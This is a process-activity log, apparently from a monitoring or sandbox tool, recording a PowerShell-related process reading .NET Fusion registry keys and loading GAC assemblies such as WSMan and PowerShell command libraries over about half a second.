00:04:829 | Registry | Read SIG | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61
00:04:829 | Registry | Read Modules | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61
00:04:829 | Registry | Read EvalationData | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
00:04:829 | Registry | Read LastModTime | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38
00:04:829 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61
00:04:829 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38
00:04:829 | Registry | Read Modules | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38
00:04:829 | Registry | Read SIG | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38
00:04:829 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38
00:04:829 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
00:04:829 | Registry | Read NIDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
00:04:829 | Registry | Read MissingDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
00:04:829 | Registry | Read MVID | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
00:04:829 | Registry | Read ILDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
00:04:829 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
00:04:829 | Registry | Read SIG | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
00:04:829 | Registry | Read Modules | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
00:04:829 | Registry | Read LastModTime | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
00:04:829 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
00:04:829 | Registry | Read MissingDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
00:04:829 | Registry | Read ConfigMask | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
00:04:829 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38
00:04:829 | Registry | Read ILDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
00:04:829 | Registry | Read ConfigString | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
00:04:829 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
00:04:829 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
00:04:829 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61
00:04:829 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
00:04:829 | Registry | Read EvalationData | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
00:04:829 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
00:04:829 | Registry | Read ConfigMask | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
00:04:829 | Registry | Read ConfigString | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
00:04:829 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
00:04:829 | Registry | Read NIDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
00:04:829 | Registry | Read MVID | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
00:04:829 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
00:04:843 | Registry | Read Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL | HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:843 | Registry | Opened | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.3.5.System.Core__b77a5c561934e089
00:04:843 | Registry | Read System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL | HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:843 | Registry | Opened | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
00:04:843 | Registry | Read System.Core,3.5.0.0,,b77a5c561934e089,MSIL | HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:843 | Registry | Read LastModTime | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61
00:04:860 | File | Operations, miscellaneous | Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.INI
00:04:860 | File | Operations, miscellaneous | Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.INI
00:04:875 | Files Read | C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll

00:04:954 | Registry | Read ILDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
00:04:954 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
00:04:954 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06
00:04:954 | Registry | Read ConfigMask | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
00:04:954 | Registry | Read ConfigString | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
00:04:954 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
00:04:954 | Registry | Read EvalationData | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
00:04:954 | Registry | Read MVID | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
00:04:954 | Registry | Read NIDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
00:04:954 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
00:04:968 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
00:04:968 | Registry | Read MissingDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
00:04:968 | Registry | Read Modules | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
00:04:968 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
00:04:968 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
00:04:985 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
00:04:985 | Registry | Read System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL | HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:985 | Registry | Opened | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
00:04:985 | Registry | Read System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL | HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:985 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
00:04:985 | Registry | Read SIG | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
00:04:985 | Registry | Read Modules | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
00:04:985 | Registry | Opened | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
00:04:985 | Registry | Read LastModTime | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
00:04:985 | Registry | Read SIG | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
00:04:985 | Registry | Read LastModTime | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
00:04:985 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
00:05:000 | File | Operations, miscellaneous | Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.INI

00:05:063 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
00:05:063 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25
00:05:063 | Registry | Read EvalationData | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
00:05:063 | Registry | Read MissingDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
00:05:063 | Registry | Read ConfigString | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
00:05:063 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26
00:05:063 | Registry | Read MVID | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
00:05:063 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26
00:05:063 | Registry | Read LastModTime | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26
00:05:063 | Registry | Read ConfigMask | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
00:05:063 | Registry | Read NIDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
00:05:063 | Registry | Read SIG | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26
00:05:063 | Registry | Read Modules | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26
00:05:063 | Registry | Read ILDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
00:05:063 | Registry | Read Modules | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c
00:05:063 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25
00:05:063 | Registry | Read SIG | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25
00:05:063 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c
00:05:063 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
00:05:063 | Registry | Opened | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Management__31bf3856ad364e35
00:05:063 | Registry | Read Modules | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25
00:05:063 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f
00:05:063 | Registry | Read LastModTime | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c
00:05:063 | Registry | Read SIG | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c
00:05:063 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c
00:05:063 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26
00:05:063 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c
00:05:063 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25
00:05:063 | Registry | Read LastModTime | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25
00:05:063 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
00:05:079 | Registry | Read System.ServiceProcess,2.0.0.0,,b03f5f7f11d50a3a,MSIL | HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:079 | Registry | Opened | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Runtime__31bf3856ad364e35
00:05:079 | File | Operations, miscellaneous | Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.INI
00:05:079 | Registry | Opened | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.ServiceProcess__b03f5f7f11d50a3a
00:05:079 | Registry | Read Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL | HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:079 | Registry | Read Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL | HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:079 | Files Read | Opened Normal | C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll
00:05:093 | Files Read | C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71
00:05:110
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71
00:05:110
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71
00:05:110
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71
00:05:110
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71
00:05:110
Read Status

Registry
00:05:110 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
Opened

Registry
00:05:110 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
00:05:110
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
00:05:110
Read NIDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
00:05:110
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
00:05:110
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
00:05:110
Read ILDependencies

Registry
00:05:110 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71
Opened

00:05:110 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 Read EvalationData

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
00:05:110
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
00:05:110
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
00:05:110
Read ConfigMask

00:05:125 File Operations, miscellaneous Searched a directory for the name: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.INI

Registry
00:05:125 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.EnterpriseServices__b03f5f7f11d50a3a
Opened

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:125
Read System.EnterpriseServices,2.0.0.0,,b03f5f7f11d50a3a,x86

00:05:140 Files Read C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll Opened Normal

00:05:140 Files Read C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll Opened 8000000

Registry
00:05:171 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Utility__31bf3856ad364e35
Opened

Registry
00:05:171 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04
Opened

Registry
00:05:171 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35
00:05:188
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35
00:05:188
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35
00:05:188
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35
00:05:188
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35
00:05:188
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
00:05:188
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
00:05:188
Read NIDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
00:05:188
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
00:05:188
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
00:05:188 Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
00:05:188
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
00:05:188
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
00:05:188
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
00:05:188
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43
00:05:188
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
00:05:188
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
00:05:188
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
00:05:188
Read EvalationData

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
00:05:188
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
00:05:188
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
00:05:188
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
00:05:188
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
00:05:188
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
00:05:188
Read ConfigMask

Registry
00:05:188 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43
00:05:188
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43
00:05:188
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43
00:05:188
Read Modules

00:05:188 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43 Read DisplayName

00:05:188 Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Read System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:188
Read System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL

Registry
00:05:188 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.JScript__b03f5f7f11d50a3a
Opened

Registry
00:05:188 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
Opened

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:188
Read Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:188
Read Microsoft.JScript,8.0.0.0,,b03f5f7f11d50a3a,MSIL

Registry
00:05:188 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
00:05:188
Read MVID

Registry
00:05:188 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
Opened

Registry
00:05:188 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
Opened

Registry
00:05:188 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43
Opened

00:05:204 File Operations, miscellaneous Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.INI

00:05:204 Files Read C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll

00:05:218 Files Read C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36
00:05:235
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a
00:05:235
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a
00:05:235
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a
00:05:235
Read LastModTime

Registry
00:05:235 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a
00:05:235
Read DisplayName

Registry
00:05:235 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36
Opened

Registry
00:05:235 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Management__31bf3856ad364e35
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a
00:05:235
Read SIG

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:235
Read Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL

Registry
00:05:235 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36
00:05:235
Read ConfigMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36
00:05:235
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36
00:05:235
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36
00:05:235
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36
00:05:235
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36
00:05:235
Read Status

Registry
00:05:235 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web.Services__b03f5f7f11d50a3a
Opened

00:05:235 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 Read MissingDependencies

